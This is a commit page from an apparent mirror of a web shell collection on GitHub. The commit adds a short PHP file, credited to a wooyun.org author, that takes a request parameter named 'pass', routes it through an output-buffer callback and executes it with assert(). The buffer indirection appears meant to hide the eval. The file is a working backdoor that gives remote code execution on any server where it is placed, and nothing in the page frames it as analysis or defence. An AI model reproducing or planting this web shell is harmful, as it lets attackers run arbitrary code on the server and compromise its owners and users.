1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00

add w-ob_start01.php

from : wooyun.org
author : isno
This commit is contained in:
tennc
2015-10-29 20:28:44 +08:00
parent 777cd7a179
commit e046b28382

View File

@@ -0,0 +1,7 @@
<?php
$evalstr="";
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>